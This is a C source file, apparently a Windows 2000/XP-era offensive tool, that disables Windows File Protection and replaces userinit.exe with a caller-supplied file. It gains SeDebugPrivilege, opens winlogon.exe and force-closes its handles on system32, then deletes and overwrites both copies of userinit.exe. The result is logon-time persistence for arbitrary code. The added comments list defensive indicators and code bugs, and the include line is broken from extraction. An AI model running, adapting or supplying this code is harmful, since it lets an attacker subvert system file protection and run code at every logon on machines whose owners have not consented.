/*
 * u_replAce.c -- overwrites %SystemRoot%\system32\userinit.exe and its
 * dllcache copy with a caller-supplied file, after enabling SeDebugPrivilege
 * and closing, inside winlogon.exe, the handles that Windows File Protection
 * (WFP) keeps open on the system32 directory.
 *
 * Defensive notes (what a monitoring stack can key on):
 *   - userinit.exe is started by winlogon at logon, so replacing it is a
 *     logon-time persistence technique; file-integrity monitoring of
 *     system32\userinit.exe and system32\dllcache\userinit.exe sees the
 *     end result directly.
 *   - The dllcache and WINNT\SYSTEM32 paths below point at the Windows
 *     2000/XP-era WFP design; later Windows protects system files differently
 *     (Windows Resource Protection), so this approach is not expected to apply
 *     there -- TODO confirm against the target OS.
 *   - Observable behaviour: OpenProcess(PROCESS_ALL_ACCESS) on winlogon.exe,
 *     cross-process DuplicateHandle with DUPLICATE_CLOSE_SOURCE, enabling of
 *     SeDebugPrivilege, and DeleteFile/CopyFile on the two userinit.exe paths.
 *
 * NOTE(review): the three system header names were lost when this page was
 * extracted; the directive is kept exactly as recovered.
 */
#include#include #include #include "u_replAce.h"

BOOL DisAbleWFP( void );
DWORD FindProcess( char* pProcessNAme );
PULONG GetHandleList( void );
BOOL CompAreStringBAckwArds( WCHAR *Str1, WCHAR *Str2 );
BOOL DisAbleWFP( void );   /* duplicate prototype; harmless */
int RAisePrivilege( void );
int ReplAceUserinit( char* withwhom //ultimately replaces userinit.exe; this function does not delete withwhom
);
//--------------------------------------------------------------------
/*
 * ReplAceUserinit -- copy `withwhom` over both copies of userinit.exe.
 *
 * @param withwhom  path of the file to copy over userinit.exe; it is not
 *                  deleted by this function.
 * @return always 0, whether or not the replacement happened; the outcome is
 *         only reported via printf.
 *
 * NOTE(review): the return values of GetSystemDirectory, DeleteFile and
 * CopyFile are never checked, and the strcat calls are unbounded -- a system
 * directory path close to MAX_PATH would overrun the two buffers.
 */
int ReplAceUserinit( char* withwhom )
{
    char userinit_system32[MAX_PATH+1];
    char userinit_system32_dllcAche[MAX_PATH+1];

    /* both buffers start as the system directory, then get a suffix appended */
    GetSystemDirectory(userinit_system32,MAX_PATH);
    GetSystemDirectory(userinit_system32_dllcAche,MAX_PATH);
    strcat(userinit_system32,"\\userinit.exe");
    strcat(userinit_system32_dllcAche,"\\dllcache\\userinit.exe");

    RAisePrivilege();   /* result ignored: a failure is only printed by the callee */

    if(DisAbleWFP()){
        /* the dllcache copy is replaced before the live one */
        DeleteFile(userinit_system32_dllcAche);
        CopyFile( withwhom, userinit_system32_dllcAche, FALSE );
        DeleteFile(userinit_system32);
        CopyFile( withwhom, userinit_system32, FALSE );
        printf("replAce done.\n");
    }
    else{
        printf("didn't disAble WFP\n");
    }
    return 0;
}
//--------------------------------------------------------------------
/*
 * DisAbleWFP -- close, inside winlogon.exe, every handle whose object name
 * ends in WINDOWS\SYSTEM32 or WINNT\SYSTEM32.
 *
 * Walks the system handle table returned by GetHandleList, duplicates each
 * handle owned by winlogon into this process, asks ntdll!ZwQueryObject for
 * its name and, when the upper-cased name carries one of the two suffixes,
 * duplicates it once more with DUPLICATE_CLOSE_SOURCE so that the original
 * handle is closed in winlogon.
 *
 * @return FALSE only when winlogon.exe is not found; TRUE otherwise, even if
 *         no handle matched.
 *
 * NOTE(review): hLib, the GetProcAddress result, hProcess and the
 * GetHandleList result (which may be NULL) are used unchecked; hCopy is only
 * closed on the matching branch, so every other duplicated handle leaks; the
 * loop compares the signed i with the unsigned number.
 */
BOOL DisAbleWFP()
{
    int i;
    BOOL bBool;
    DWORD pid;
    HANDLE hProcess;
    HANDLE hCopy;
    NTSTATUS dwStAtus;
    HINSTANCE hLib;
    ZWQUERYOBJECT pZwQueryObject;
    PSYSTEM_HANDLE_INFORMATION pInfor;
    DWORD number;
    PULONG pBuffer;
    /* Receives the ObjectNameInformation result: a UNICODE_STRING followed by
     * the characters it points at -- layout assumed from the call below, and
     * _wcsupr assumes Buffer is NUL-terminated; the author's own comment
     * says "careful". */
    struct {UNICODE_STRING Name; WCHAR Buffer[MAX_PATH + 1]; } ObjNAme;//cAreful

    hLib = LoadLibrary("ntdll.dll");
    pZwQueryObject = (ZWQUERYOBJECT)GetProcAddress(hLib,"ZwQueryObject");

    pid = FindProcess("winlogon.exe");
    if(pid == 0){
        printf("cAn not find the winlogon.exe process\n");
        return FALSE;
    }
    hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid );

    pBuffer = GetHandleList();
    /* leading ULONG is taken as the entry count, entries follow it
     * (PSYSTEM_HANDLE_INFORMATION comes from u_replAce.h, not visible here) */
    number = *(ULONG*)pBuffer;
    pInfor = (PSYSTEM_HANDLE_INFORMATION)((ULONG*)pBuffer+1);

    for(i = 0;i < number;i ++){
        if(pInfor->ProcessId == pid){
            bBool = DuplicateHandle( hProcess, (HANDLE)(pInfor->Handle), GetCurrentProcess(), &hCopy, 0, FALSE, DUPLICATE_SAME_ACCESS );
            if(bBool){
                dwStAtus = pZwQueryObject( hCopy, ObjectNameInformation, &ObjNAme, sizeof(ObjNAme), NULL );
                if(dwStAtus == STATUS_SUCCESS){
                    /* upper-case so the case-sensitive suffix compare works */
                    _wcsupr(ObjNAme.Buffer );
                    if(CompAreStringBAckwArds(ObjNAme.Buffer,L"WINDOWS\\SYSTEM32") || CompAreStringBAckwArds(ObjNAme.Buffer,L"WINNT\\SYSTEM32")) {
                        CloseHandle(hCopy);
                        /* DUPLICATE_CLOSE_SOURCE closes the source handle in winlogon */
                        DuplicateHandle( hProcess, (HANDLE)(pInfor->Handle), GetCurrentProcess(), &hCopy, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE );
                        CloseHandle(hCopy);
                    }
                }
            }
        }//if
        pInfor++;
    }//for
    free(pBuffer);
    //free(ObjNAme.Name.Buffer);
    CloseHandle(hProcess);
    return TRUE;
}
//--------------------------------------------------------------------
/*
 * FindProcess -- look up a process id by executable name.
 *
 * @param pProcessNAme  image name to match, compared case-insensitively
 *                      (stricmp) against szExeFile.
 * @return th32ProcessID of the first match, or 0 when nothing matches or the
 *         snapshot could not be created.
 *
 * NOTE(review): on a match the function returns without closing hSnApshot,
 * and on the INVALID_HANDLE_VALUE path CloseHandle is called on that value.
 */
DWORD FindProcess(char* pProcessNAme)
{
    BOOL f0k;
    HANDLE hSnApshot;
    PROCESSENTRY32 te = {sizeof(te)};   /* first member (dwSize) set, as Process32First requires */

    hSnApshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(hSnApshot!=INVALID_HANDLE_VALUE){
        f0k = Process32First(hSnApshot,&te);
        for(;f0k;f0k=Process32Next(hSnApshot,&te)){
            //printf("%d %s\n",te.th32ProcessID ,te.szExeFile );
            if(0 == stricmp(te.szExeFile ,pProcessNAme)){
                return te.th32ProcessID;
            }
        }
    }
    CloseHandle(hSnApshot);
    return 0;
}
//--------------------------------------------------------------------
/*
 * GetHandleList -- fetch the raw SystemHandleInformation table from ntdll.
 *
 * Starts with a 0x1000-byte buffer and doubles it for as long as
 * ZwQuerySystemInformation answers STATUS_INFO_LENGTH_MISMATCH.
 *
 * @return malloc'ed buffer holding the table; the caller must free it.
 *         NULL when the query fails with any other unsuccessful status.
 *
 * NOTE(review): malloc results are not checked, and hLib is never released
 * with FreeLibrary.
 */
PULONG GetHandleList(void)///free the buffer by cAller
{
    ULONG cbBuffer = 0x1000;
    PULONG pBuffer;
    NTSTATUS Status;
    HINSTANCE hLib;
    ZWQUERYSYSTEMINFORMATION pZwQuerySystemInformAtion;

    hLib = LoadLibrary("ntdll.dll");
    pZwQuerySystemInformAtion = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hLib,"ZwQuerySystemInformation");

    pBuffer = malloc(cbBuffer);
    do {
        Status = pZwQuerySystemInformAtion( SystemHandleInformation, pBuffer, cbBuffer, NULL );
        if (Status == STATUS_INFO_LENGTH_MISMATCH) {
            /* buffer too small: release it and retry with twice the size */
            free(pBuffer);
            pBuffer = malloc(cbBuffer *= 2);
        }
        else if (!NT_SUCCESS(Status)) {
            free(pBuffer);
            return NULL;
        }
    }while (Status == STATUS_INFO_LENGTH_MISMATCH);
    return pBuffer;
}
//--------------------------------------------------------------------
/*
 * CompAreStringBAckwArds -- test whether Str2 is a suffix of Str1.
 *
 * Compares the two strings from their last characters backwards; the
 * comparison is case-sensitive (DisAbleWFP upper-cases its input first).
 *
 * @param Str1  string being tested; must be non-NULL and NUL-terminated.
 * @param Str2  suffix to look for; same requirements.
 * @return TRUE when Str1 ends with Str2 (an empty Str2 always matches), FALSE
 *         when Str2 is longer than Str1 or any compared character differs.
 */
BOOL CompAreStringBAckwArds(WCHAR *Str1, WCHAR *Str2)
{
    INT Len1 = wcslen(Str1), Len2 = wcslen(Str2);   /* size_t narrowed to INT */
    if (Len2 > Len1) return FALSE;
    /* walk both indices down from the last character of each string */
    for (Len2--, Len1--; Len2 >= 0; Len2--, Len1--){
        if (Str1[Len1] != Str2[Len2]) return FALSE;
    }
    return TRUE;
}
//--------------------------------------------------------------------
/*
 * RAisePrivilege -- enable SeDebugPrivilege (SE_DEBUG_NAME) in the current
 * process token; called before DisAbleWFP, presumably so that winlogon.exe
 * can be opened.
 *
 * @return 0 on success, -1 when LookupPrivilegeValue, OpenProcessToken or
 *         AdjustTokenPrivileges fails (the failure is printed).
 *
 * NOTE(review): hProcess is unused and hProcessToken is never closed.
 * A non-zero return from AdjustTokenPrivileges does not by itself mean the
 * privilege was assigned; GetLastError is not consulted on that path.
 * GetLastError() yields a DWORD but is printed with %d.
 */
int RAisePrivilege(void)
{
    TOKEN_PRIVILEGES tp;
    LUID luid;
    HANDLE hProcess = NULL,hProcessToken = NULL;

    if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid)){
        printf("LookupPrivilegeVAlue fAiled: %d\n",GetLastError());
        return -1;
    }
    if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken)){
        printf("OpenProcessToken fAiled: %d\n",GetLastError());
        return -1;
    }
    tp.PrivilegeCount =1;   // exactly one privilege to set
    tp.Privileges [0].Luid = luid;
    tp.Privileges [0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hProcessToken, FALSE,&tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL) ){
        printf("AdjustTokenPrivileges fAiled: %d\n",GetLastError());
        return -1;
    }
    return 0;
}
//--------------------------------------------------------------------